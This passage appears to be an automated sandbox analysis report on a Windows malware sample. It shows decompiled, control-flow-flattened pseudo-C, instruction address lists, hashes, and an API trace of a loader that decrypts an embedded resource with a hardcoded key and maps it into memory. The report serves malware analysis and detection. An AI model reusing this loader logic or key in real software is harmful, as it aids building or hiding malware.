                                              				_v292 = _v292 * 0x16;
                                              				_v292 = _v292 * 0x7f;
                                              				_v292 = _v292 ^ 0x09643e15;
                                              				_v600 = 0x4d46;
                                              				_v600 = _v600 + 0xffff0db8;
                                              				_v600 = _v600 + 0x84f3;
                                              				_v600 = _v600 + 0xc039;
                                              				_v600 = _v600 ^ 0x0000d5ed;
                                              				_v432 = 0x8bd1;
                                              				_v432 = _v432 << 0xc;
                                              				_v432 = _v432 + 0x8a22;
                                              				_v432 = _v432 / _t1372;
                                              				_v432 = _v432 ^ 0x003284c4;
                                              				_v288 = 0x245c;
                                              				_v288 = _v288 | 0x526859ae;
                                              				_v288 = _v288 * 0xc;
                                              				_v288 = _v288 ^ 0xdce5b0ef;
                                              				while(1) {
                                              					L1:
                                              					do {
                                              						while(1) {
                                              							L2:
                                              							_t1391 = _t1225 - 0x1bd1caec;
                                              							if(_t1391 <= 0) {
                                              							}
                                              							L3:
                                              							if(_t1391 == 0) {
                                              								__eflags = E002302C3();
                                              								if(__eflags == 0) {
                                              									_t1135 = E00227903();
                                              									asm("sbb ecx, ecx");
                                              									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
                                              									while(1) {
                                              										L2:
                                              										_t1391 = _t1225 - 0x1bd1caec;
                                              										if(_t1391 <= 0) {
                                              										}
                                              										goto L3;
                                              									}
                                              								}
                                              								_t1144 = E00227903();
                                              								asm("sbb ecx, ecx");
                                              								_t1257 =  ~_t1144 & 0x03449ef9;
                                              								L32:
                                              								_t1225 = _t1257 + 0xda99535;
                                              								while(1) {
                                              									L2:
                                              									_t1391 = _t1225 - 0x1bd1caec;
                                              									if(_t1391 <= 0) {
                                              									}
                                              									goto L54;
                                              								}
                                              								goto L3;
                                              							}
                                              							_t1392 = _t1225 - 0x10ee342e;
                                              							if(_t1392 > 0) {
                                              								__eflags = _t1225 - 0x15603e6b;
                                              								if(__eflags > 0) {
                                              									__eflags = _t1225 - 0x159448ba;
                                              									if(_t1225 == 0x159448ba) {
                                              										E0022C562(_v540,  &_v80, _v332, _v192);
                                              										_t1225 = 0x17799f6a;
                                              										continue;
                                              									}
                                              									__eflags = _t1225 - 0x1653011b;
                                              									if(_t1225 == 0x1653011b) {
                                              										E0022F536(_v384, _v256, _v300, _v140);
                                              										_t1225 = 0x21caf663;
                                              										continue;
                                              									}
                                              									__eflags = _t1225 - 0x17799f6a;
                                              									if(_t1225 == 0x17799f6a) {
                                              										_t1138 = E00229A37( &_v112,  &_v132, _v460, _v548);
                                              										asm("sbb ecx, ecx");
                                              										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
                                              										continue;
                                              									}
                                              									__eflags = _t1225 - 0x1b19f75b;
                                              									if(_t1225 != 0x1b19f75b) {
                                              										break;
                                              									}
                                              									_t1144 = E002373AC();
                                              									asm("sbb ecx, ecx");
                                              									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
                                              									continue;
                                              								}
                                              								if(__eflags == 0) {
                                              									_t1144 = E0022F444(_t1225);
                                              									L112:
                                              									return _t1144;
                                              								}
                                              								__eflags = _t1225 - 0x10f69b27;
                                              								if(_t1225 == 0x10f69b27) {
                                              									_t1144 = E0023AB96();
                                              									_t1225 = 0x326a8235;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x11454f34;
                                              								if(_t1225 == 0x11454f34) {
                                              									_t1144 = E0022D7EB();
                                              									_t1225 = 0x356cf65c;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x11dfa862;
                                              								if(__eflags == 0) {
                                              									_t1225 = 0x376e2cde;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x13c96655;
                                              								if(_t1225 != 0x13c96655) {
                                              									break;
                                              								}
                                              								_t1144 = E002262A3();
                                              								goto L112;
                                              							}
                                              							if(_t1392 == 0) {
                                              								_t1140 = E0022153C();
                                              								asm("sbb ecx, ecx");
                                              								_t1257 =  ~_t1140 & 0x061fd120;
                                              								__eflags = _t1257;
                                              								goto L32;
                                              							}
                                              							_t1393 = _t1225 - 0x55e3088;
                                              							if(_t1393 > 0) {
                                              								__eflags = _t1225 - 0x7ff6f9b;
                                              								if(_t1225 == 0x7ff6f9b) {
                                              									_t1336 = _v436;
                                              									E0022F536(_v556, _t1336, _v564, _v80);
                                              									_t1225 = 0x3140af28;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0xb356ed5;
                                              								if(_t1225 == 0xb356ed5) {
                                              									_t1144 = E0022C2E2();
                                              									_v104 = _t1144;
                                              									_t1225 = 0x288da576;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0xd8c7d27;
                                              								if(_t1225 == 0xd8c7d27) {
                                              									_push( &_v68);
                                              									_t1336 = _v572;
                                              									_t1144 = E00232349(_v280, _t1336, _v468, _v580, _t1225);
                                              									_t1387 = _t1387 + 0x10;
                                              									__eflags = _t1144;
                                              									if(__eflags == 0) {
                                              										L28:
                                              										_t1225 = 0x15603e6b;
                                              										continue;
                                              									}
                                              									_t1336 = _v316;
                                              									_v112 =  &_v68;
                                              									_t1144 = E0022DFE2(_v400, _t1336,  &_v68);
                                              									_v108 = _t1144;
                                              									_t1225 = 0x2267098;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0xda99535;
                                              								if(_t1225 != 0xda99535) {
                                              									break;
                                              								}
                                              								E00237D03();
                                              								_t1144 = E00228317();
                                              								L25:
                                              								_t1225 = 0x23233137;
                                              								continue;
                                              							}
                                              							if(_t1393 == 0) {
                                              								_t1144 = E002363C1();
                                              								_t1225 = 0x3544b2a;
                                              								continue;
                                              							}
                                              							if(_t1225 == 0x13a2b08) {
                                              								_t1225 = 0x282d346f;
                                              								continue;
                                              							}
                                              							if(_t1225 == 0x2267098) {
                                              								_t1144 = E0023611C();
                                              								_v72 = _t1144;
                                              								_t1225 = 0xb356ed5;
                                              								continue;
                                              							}
                                              							if(_t1225 == 0x2a32d0a) {
                                              								_t1225 = 0x34a6f88;
                                              								continue;
                                              							}
                                              							if(_t1225 == 0x34a6f88) {
                                              								_t1144 = E00233632(__eflags);
                                              								__eflags = _t1144;
                                              								if(__eflags == 0) {
                                              									goto L112;
                                              								} else {
                                              									_t1225 = 0x3833d453;
                                              									continue;
                                              								}
                                              							}
                                              							if(_t1225 != 0x3544b2a) {
                                              								break;
                                              							} else {
                                              								_t1144 = E00231BDF();
                                              								_t1225 = 0x371670b5;
                                              								continue;
                                              							}
                                              							L54:
                                              							__eflags = _t1225 - 0x2e6b2744;
                                              							if(__eflags > 0) {
                                              								__eflags = _t1225 - 0x35bdcd5f;
                                              								if(__eflags > 0) {
                                              									__eflags = _t1225 - 0x371670b5;
                                              									if(_t1225 == 0x371670b5) {
                                              										E00238F49();
                                              										_t1225 = 0x30491502;
                                              										break;
                                              									}
                                              									__eflags = _t1225 - 0x376e2cde;
                                              									if(__eflags == 0) {
                                              										_v148 = E0022F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
                                              										E002248BD( &_v148, _v204, _v456, _v464);
                                              										_t1387 = _t1387 + 0x18;
                                              										_t1336 = _v148;
                                              										E00232025(_v304, _t1336, _v196, _v448);
                                              										_t1225 = 0x13a2b08;
                                              										continue;
                                              									}
                                              									__eflags = _t1225 - 0x37f9587b;
                                              									if(__eflags == 0) {
                                              										_v96 = 0x1346150;
                                              										_t1225 = 0x2e6b2744;
                                              										continue;
                                              									}
                                              									__eflags = _t1225 - 0x3833d453;
                                              									if(_t1225 != 0x3833d453) {
                                              										break;
                                              									}
                                              									_t1144 = E00236014(); // executed
                                              									_t1225 = 0x1e57e2ba;
                                              									continue;
                                              								}
                                              								if(__eflags == 0) {
                                              									_t1336 = _v320;
                                              									_t1144 = E0023A0AF(_v504, _t1336, _v512,  &_v88);
                                              									_t1225 = 0x159448ba;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x30491502;
                                              								if(_t1225 == 0x30491502) {
                                              									_t1144 = E0022EE78();
                                              									__eflags = _t1144;
                                              									if(__eflags == 0) {
                                              										goto L112;
                                              									}
                                              									_t1225 = 0x2a91822d;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x3140af28;
                                              								if(_t1225 == 0x3140af28) {
                                              									_t1336 = _v228;
                                              									_t1144 = E0022F536(_v328, _t1336, _v336, _v88);
                                              									goto L25;
                                              								}
                                              								__eflags = _t1225 - 0x326a8235;
                                              								if(__eflags == 0) {
                                              									_t1336 =  &_v124;
                                              									_t1144 = E002371EF(_t1336, __eflags, _v528);
                                              									__eflags = _t1144;
                                              									if(__eflags != 0) {
                                              										asm("xorps xmm0, xmm0");
                                              										asm("movlpd [esp+0x1d0], xmm0");
                                              									}
                                              									L95:
                                              									_t1225 = 0x1653011b;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x356cf65c;
                                              								if(_t1225 != 0x356cf65c) {
                                              									break;
                                              								}
                                              								_t1144 = E002367F0();
                                              								_t1225 = 0x13c96655;
                                              								continue;
                                              							}
                                              							if(__eflags == 0) {
                                              								_v92 = 0x1388;
                                              								_t1225 = 0x35bdcd5f;
                                              								continue;
                                              							}
                                              							__eflags = _t1225 - 0x23233137;
                                              							if(__eflags > 0) {
                                              								__eflags = _t1225 - 0x2596cdc9;
                                              								if(_t1225 == 0x2596cdc9) {
                                              									_push(_v388);
                                              									_push(_v584);
                                              									_push(_v380);
                                              									_t1336 = _v260;
                                              									_push( &_v132);
                                              									_push( &_v140);
                                              									_t1172 = E00229FDC(_t1336);
                                              									_t1389 = _t1387 + 0x14;
                                              									__eflags = _t1172;
                                              									if(_t1172 == 0) {
                                              										E0022790F();
                                              										E002278A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
                                              										_t1387 = _t1389 + 0x10;
                                              										_t1144 = E00228317();
                                              										_t1225 = 0x21caf663;
                                              										asm("adc ebx, 0x0");
                                              									} else {
                                              										_t1384 = 0x35bdcd5f;
                                              										_t1213 = E002278A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
                                              										_t1387 = _t1389 + 0x10;
                                              										_t1144 = E00228317();
                                              										_t1224 = _t1336;
                                              										_t1348 = _t1144 + _t1213;
                                              										_t1225 = 0x21c9d3c7;
                                              										asm("adc ebx, 0x0");
                                              									}
                                              									while(1) {
                                              										L1:
                                              										goto L2;
                                              									}
                                              								}
                                              								__eflags = _t1225 - 0x282d346f;
                                              								if(_t1225 == 0x282d346f) {
                                              									_t1384 = 0xd8c7d27;
                                              									_t1186 = E002278A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
                                              									_t1387 = _t1387 + 0x10;
                                              									_t1144 = E00228317();
                                              									_t1224 = _t1336;
                                              									_t1348 = _t1144 + _t1186;
                                              									_t1225 = 0x23233137;
                                              									asm("adc ebx, 0x0");
                                              									goto L1;
                                              								}
                                              								__eflags = _t1225 - 0x288da576;
                                              								if(_t1225 == 0x288da576) {
                                              									_t1144 = E0022F326();
                                              									_v100 = _t1144;
                                              									_t1225 = 0x37f9587b;
                                              									continue;
                                              								}
                                              								__eflags = _t1225 - 0x2a91822d;
                                              								if(_t1225 != 0x2a91822d) {
                                              									break;
                                              								}
                                              								E00233895();
                                              								_t1144 = E00227903();
                                              								asm("sbb ecx, ecx");
                                              								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
                                              								continue;
                                              							}
                                              							if(__eflags == 0) {
                                              								_t1144 = _t1348 | _t1224;
                                              								__eflags = _t1144;
                                              								if(_t1144 != 0) {
                                              									_t1199 = E002278A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
                                              									_t1387 = _t1387 + 8;
                                              									_t1336 = _t1199;
                                              									_t1144 = E00233F62(_t1336, __eflags);
                                              									__eflags = _t1144;
                                              									if(__eflags != 0) {
                                              										goto L28;
                                              									}
                                              									_t1144 = E00228317();
                                              									__eflags = _t1336 - _t1224;
                                              									if(__eflags < 0) {
                                              										L74:
                                              										_t1225 = 0x23233137;
                                              										break;
                                              									}
                                              									if(__eflags > 0) {
                                              										goto L69;
                                              									}
                                              									__eflags = _t1144 - _t1348;
                                              									if(_t1144 >= _t1348) {
                                              										goto L69;
                                              									}
                                              									goto L74;
                                              								}
                                              								L69:
                                              								_t1225 = _t1384;
                                              								break;
                                              							}
                                              							__eflags = _t1225 - 0x1d55cf6f;
                                              							if(_t1225 == 0x1d55cf6f) {
                                              								_t1144 = E002312E2();
                                              								goto L112;
                                              							}
                                              							__eflags = _t1225 - 0x1e57e2ba;
                                              							if(_t1225 == 0x1e57e2ba) {
                                              								_t1144 = E00234B41();
                                              								__eflags = _t1144;
                                              								if(_t1144 == 0) {
                                              									goto L112;
                                              								}
                                              								_t1144 = E002384C4(_v360);
                                              								_t1225 = 0x1b19f75b;
                                              								continue;
                                              							}
                                              							__eflags = _t1225 - 0x21c9d3c7;
                                              							if(_t1225 == 0x21c9d3c7) {
                                              								_t1336 = _v524;
                                              								_t1144 = E00233FE7( &_v124, _t1336, _v240,  &_v140);
                                              								__eflags = _t1144;
                                              								if(__eflags == 0) {
                                              									goto L95;
                                              								}
                                              								_t1144 = E002367E9();
                                              								__eflags = _v116;
                                              								_t1225 = 0x10f69b27;
                                              								if(__eflags != 0) {
                                              									__eflags = _v116 - 7;
                                              									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
                                              								}
                                              								continue;
                                              							}
                                              							__eflags = _t1225 - 0x21caf663;
                                              							if(_t1225 != 0x21caf663) {
                                              								break;
                                              							}
                                              							_t1336 = _v444;
                                              							_t1144 = E0022F536(_v368, _t1336, _v532, _v132);
                                              							_t1225 = 0x7ff6f9b;
                                              						}
                                              						__eflags = _t1225 - 0x3adf5394;
                                              					} while (__eflags != 0);
                                              					goto L112;
                                              				}
                                              			}
                                              0x00223d3d
                                              0x00223d48
                                              0x00223d50
                                              0x00223d5b
                                              0x00223d66
                                              0x00223d6e
                                              0x00223d7b
                                              0x00223d8f
                                              0x00223d9b
                                              0x00223da2
                                              0x00223dad
                                              0x00223db8
                                              0x00223dc3
                                              0x00223dce
                                              0x00223dd9
                                              0x00223de4
                                              0x00223df9
                                              0x00223e01
                                              0x00223e08
                                              0x00223e13
                                              0x00223e2a
                                              0x00223e2e
                                              0x00223e36
                                              0x00223e3b
                                              0x00223e43
                                              0x00223e56
                                              0x00223e65
                                              0x00223e6c
                                              0x00223e77
                                              0x00223e7f
                                              0x00223e87
                                              0x00223e8f
                                              0x00223e97
                                              0x00223e9f
                                              0x00223eaa
                                              0x00223eb2
                                              0x00223ec6
                                              0x00223ecd
                                              0x00223ed8
                                              0x00223ee3
                                              0x00223ef6
                                              0x00223efd
                                              0x00223f08
                                              0x00223f08
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f13
                                              0x00223f13
                                              0x00223f19
                                              0x00223f19
                                              0x00224295
                                              0x00224297
                                              0x002242cb
                                              0x002242d4
                                              0x002242dc
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f13
                                              0x00223f13
                                              0x00000000
                                              0x00223f13
                                              0x00223f0d
                                              0x002242a7
                                              0x002242b0
                                              0x002242b2
                                              0x0022411e
                                              0x0022411e
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f0d
                                              0x00223f13
                                              0x00223f13
                                              0x00000000
                                              0x00223f13
                                              0x00000000
                                              0x00223f0d
                                              0x00223f1f
                                              0x00223f25
                                              0x00224129
                                              0x0022412f
                                              0x002241a9
                                              0x002241af
                                              0x00224278
                                              0x0022427f
                                              0x00000000
                                              0x0022427f
                                              0x002241b5
                                              0x002241bb
                                              0x0022424e
                                              0x00224255
                                              0x00000000
                                              0x00224255
                                              0x002241bd
                                              0x002241c3
                                              0x00224214
                                              0x0022421f
                                              0x00224227
                                              0x00000000
                                              0x00224227
                                              0x002241c5
                                              0x002241cb
                                              0x00000000
                                              0x00000000
                                              0x002241df
                                              0x002241e8
                                              0x002241f0
                                              0x00000000
                                              0x002241f0
                                              0x00224131
                                              0x00224837
                                              0x00224851
                                              0x00224858
                                              0x00224858
                                              0x00224137
                                              0x0022413d
                                              0x0022419a
                                              0x0022419f
                                              0x00000000
                                              0x0022419f
                                              0x0022413f
                                              0x00224145
                                              0x00224184
                                              0x00224189
                                              0x00000000
                                              0x00224189
                                              0x00224147
                                              0x0022414d
                                              0x0022416c
                                              0x00000000
                                              0x0022416c
                                              0x0022414f
                                              0x00224155
                                              0x00000000
                                              0x00000000
                                              0x00224162
                                              0x00000000
                                              0x00224162
                                              0x00223f2b
                                              0x0022410d
                                              0x00224116
                                              0x00224118
                                              0x00224118
                                              0x00000000
                                              0x00224118
                                              0x00223f31
                                              0x00223f37
                                              0x00223ffd
                                              0x00224003
                                              0x002240ea
                                              0x002240f5
                                              0x002240fc
                                              0x00000000
                                              0x002240fc
                                              0x00224009
                                              0x0022400f
                                              0x002240c9
                                              0x002240ce
                                              0x002240d5
                                              0x00000000
                                              0x002240d5
                                              0x00224015
                                              0x0022401b
                                              0x0022405c
                                              0x00224069
                                              0x00224074
                                              0x00224079
                                              0x0022407c
                                              0x0022407e
                                              0x002240b4
                                              0x002240b4
                                              0x00000000
                                              0x002240b4
                                              0x00224080
                                              0x00224096
                                              0x0022409d
                                              0x002240a3
                                              0x002240aa
                                              0x00000000
                                              0x002240aa
                                              0x0022401d
                                              0x00224023
                                              0x00000000
                                              0x00000000
                                              0x00224034
                                              0x00224042
                                              0x0022404b
                                              0x0022404b
                                              0x00000000
                                              0x0022404b
                                              0x00223f3d
                                              0x00223fee
                                              0x00223ff3
                                              0x00000000
                                              0x00223ff3
                                              0x00223f49
                                              0x00223fdd
                                              0x00000000
                                              0x00223fdd
                                              0x00223f55
                                              0x00223fc7
                                              0x00223fcc
                                              0x00223fd3
                                              0x00000000
                                              0x00223fd3
                                              0x00223f5d
                                              0x00223faf
                                              0x00000000
                                              0x00223faf
                                              0x00223f65
                                              0x00223f98
                                              0x00223f9d
                                              0x00223f9f
                                              0x00000000
                                              0x00223fa5
                                              0x00223fa5
                                              0x00000000
                                              0x00223fa5
                                              0x00223f9f
                                              0x00223f6d
                                              0x00000000
                                              0x00223f73
                                              0x00223f81
                                              0x00223f86
                                              0x00000000
                                              0x00223f86
                                              0x002242e7
                                              0x002242e7
                                              0x002242ed
                                              0x00224632
                                              0x00224638
                                              0x00224736
                                              0x0022473c
                                              0x00224818
                                              0x0022481d
                                              0x00000000
                                              0x0022481d
                                              0x00224742
                                              0x00224748
                                              0x002247b9
                                              0x002247dc
                                              0x002247e1
                                              0x002247f2
                                              0x00224800
                                              0x00224807
                                              0x00000000
                                              0x00224807
                                              0x0022474a
                                              0x00224750
                                              0x00224778
                                              0x00224783
                                              0x00000000
                                              0x00224783
                                              0x00224752
                                              0x00224758
                                              0x00000000
                                              0x00000000
                                              0x00224769
                                              0x0022476e
                                              0x00000000
                                              0x0022476e
                                              0x0022463e
                                              0x0022471a
                                              0x00224725
                                              0x0022472c
                                              0x00000000
                                              0x0022472c
                                              0x00224644
                                              0x0022464a
                                              0x002246f7
                                              0x002246fc
                                              0x002246fe
                                              0x00000000
                                              0x00000000
                                              0x00224704
                                              0x00000000
                                              0x00224704
                                              0x00224650
                                              0x00224656
                                              0x002246d2
                                              0x002246e0
                                              0x00000000
                                              0x002246e6
                                              0x00224658
                                              0x0022465e
                                              0x0022468a
                                              0x00224691
                                              0x00224697
                                              0x00224699
                                              0x0022469b
                                              0x002246a3
                                              0x002246b3
                                              0x002246ba
                                              0x002246ba
                                              0x00000000
                                              0x002246ba
                                              0x00224660
                                              0x00224666
                                              0x00000000
                                              0x00000000
                                              0x00224670
                                              0x00224675
                                              0x00000000
                                              0x00224675
                                              0x002242f3
                                              0x0022461d
                                              0x00224628
                                              0x00000000
                                              0x00224628
                                              0x002242f9
                                              0x002242ff
                                              0x00224463
                                              0x00224469
                                              0x0022453f
                                              0x0022454d
                                              0x00224551
                                              0x00224558
                                              0x0022455f
                                              0x00224567
                                              0x00224568
                                              0x0022456d
                                              0x00224570
                                              0x00224572
                                              0x002245c8
                                              0x002245fb
                                              0x00224600
                                              0x00224605
                                              0x00224610
                                              0x00224615
                                              0x00224574
                                              0x00224578
                                              0x002245a2
                                              0x002245a7
                                              0x002245ac
                                              0x002245b3
                                              0x002245b5
                                              0x002245b7
                                              0x002245bc
                                              0x002245bc
                                              0x00223f08
                                              0x00223f08
                                              0x00000000
                                              0x00223f08
                                              0x00223f08
                                              0x0022446f
                                              0x00224475
                                              0x002244f3
                                              0x0022451d
                                              0x00224522
                                              0x00224527
                                              0x0022452e
                                              0x00224530
                                              0x00224532
                                              0x00224537
                                              0x00000000
                                              0x00224537
                                              0x00224477
                                              0x0022447d
                                              0x002244d6
                                              0x002244db
                                              0x002244e2
                                              0x00000000
                                              0x002244e2
                                              0x0022447f
                                              0x00224485
                                              0x00000000
                                              0x00000000
                                              0x00224499
                                              0x002244ac
                                              0x002244b5
                                              0x002244bd
                                              0x00000000
                                              0x002244bd
                                              0x00224305
                                              0x002243e8
                                              0x002243e8
                                              0x002243ea
                                              0x0022441b
                                              0x00224427
                                              0x0022442e
                                              0x00224437
                                              0x0022443e
                                              0x00224440
                                              0x00000000
                                              0x00000000
                                              0x0022444a
                                              0x0022444f
                                              0x00224451
                                              0x00224459
                                              0x00224459
                                              0x00000000
                                              0x00224459
                                              0x00224453
                                              0x00000000
                                              0x00000000
                                              0x00224455
                                              0x00224457
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00224457
                                              0x002243ec
                                              0x002243ec
                                              0x00000000
                                              0x002243ec
                                              0x0022430b
                                              0x0022430d
                                              0x0022484c
                                              0x00000000
                                              0x0022484c
                                              0x00224313
                                              0x00224319
                                              0x002243c3
                                              0x002243c8
                                              0x002243ca
                                              0x00000000
                                              0x00000000
                                              0x002243d7
                                              0x002243dc
                                              0x00000000
                                              0x002243dc
                                              0x0022431f
                                              0x00224325
                                              0x0022436c
                                              0x00224377
                                              0x0022437e
                                              0x00224380
                                              0x00000000
                                              0x00000000
                                              0x00224394
                                              0x00224399
                                              0x002243a1
                                              0x002243a6
                                              0x002243ac
                                              0x002243b4
                                              0x002243b4
                                              0x00000000
                                              0x002243a6
                                              0x00224327
                                              0x0022432d
                                              0x00000000
                                              0x00000000
                                              0x0022433e
                                              0x0022434c
                                              0x00224353
                                              0x00224353
                                              0x00224822
                                              0x00224822
                                              0x00000000
                                              0x0022482e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 4You should select the identity that belonged to you.+The Identity you selected has been deleted.;The Identity you selected could$);$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                              • API String ID: 0-736298319
                                              • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                              • Instruction ID: 573a86aa5c1b40cfc0e08eae29c6f8746d2acd47083fa5ba647bfabf12a3a63d
                                              • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                              • Instruction Fuzzy Hash: 45D213715193819BE378DF64D58ABDFBBE1BBC4304F10891DE18A862A0DBB48958CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                              • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                              • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                              • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                                • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                              • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                              • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                              • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                              • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                              • _memmove.LIBCMT ref: 1000139C
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                              • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                              				intOrPtr _v8;
                                              				void* _v12;
                                              				intOrPtr _v44;
                                              				char _v48;
                                              				signed int _t67;
                                              				void* _t72;
                                              				long _t74;
                                              				void* _t86;
                                              				void* _t89;
                                              				void* _t90;
                                              				void* _t95;
                                              				intOrPtr _t98;
                                              				intOrPtr* _t100;
                                              				void* _t109;
                                              				intOrPtr _t111;
                                              				void* _t112;
                                              				intOrPtr _t113;
                                              				void* _t114;
                                              				intOrPtr _t115;
                                              				intOrPtr _t117;
                                              				intOrPtr _t118;
                                              				intOrPtr* _t128;
                                              				intOrPtr* _t129;
                                              				signed int _t131;
                                              				intOrPtr _t133;
                                              				signed int _t135;
                                              				long _t138;
                                              				long _t139;
                                              				void* _t147;
                                              				void* _t148;
                                              				void* _t149;
                                              				void* _t150;
                                              
                                              				_t113 = _a8;
                                              				_t147 = 0;
                                              				_v8 = __ecx;
                                              				if(_t113 >= 0x40) {
                                              					_t129 = _a4;
                                              					if( *_t129 == 0x5a4d) {
                                              						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
                                              						if(_t113 < _t117 + 0xf8) {
                                              							goto L1;
                                              						} else {
                                              							_t114 = _t117 + _t129;
                                              							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
                                              								goto L3;
                                              							} else {
                                              								_t12 = _t114 + 0x14; // 0xc033cd33
                                              								_t67 =  *_t12 & 0x0000ffff;
                                              								_t13 = _t114 + 6; // 0xe8ef4d8d
                                              								_t135 =  *_t13 & 0x0000ffff;
                                              								if(_t135 != 0) {
                                              									_t14 = _t114 + 0x24; // 0x100013ef
                                              									_t128 = _t14 + _t67;
                                              									do {
                                              										_t15 = _t128 + 4; // 0x12f7805
                                              										_t133 =  *_t15;
                                              										_t111 =  *_t128;
                                              										if(_t133 != 0) {
                                              											_t112 = _t111 + _t133;
                                              										} else {
                                              											_t16 = _t114 + 0x38; // 0xff1075ff
                                              											_t112 = _t111 +  *_t16;
                                              										}
                                              										_t147 = _t112 > _t147 ? _t112 : _t147;
                                              										_t128 = _t128 + 0x28;
                                              										_t135 = _t135 - 1;
                                              									} while (_t135 != 0);
                                              								}
                                              								_push( &_v48); // executed
                                              								L100037FA(); // executed
                                              								_t118 = _v44;
                                              								_t19 = _t118 - 1; // -1
                                              								_t20 = _t114 + 0x50; // 0xcc25d
                                              								_t21 = _t118 - 1; // -1
                                              								_t22 = _t118 - 1; // -1
                                              								_t131 =  !_t21;
                                              								_t138 = _t19 +  *_t20 & _t131;
                                              								if(_t138 == (_t22 + _t147 & _t131)) {
                                              									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
                                              									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
                                              									_t148 = _t72;
                                              									_v12 = _t148;
                                              									if(_t148 != 0) {
                                              										L18:
                                              										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                              										_t139 = _t74;
                                              										if(_t139 != 0) {
                                              											 *(_t139 + 4) = _t148;
                                              											_t27 = _t114 + 0x16; // 0xe85ec033
                                              											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
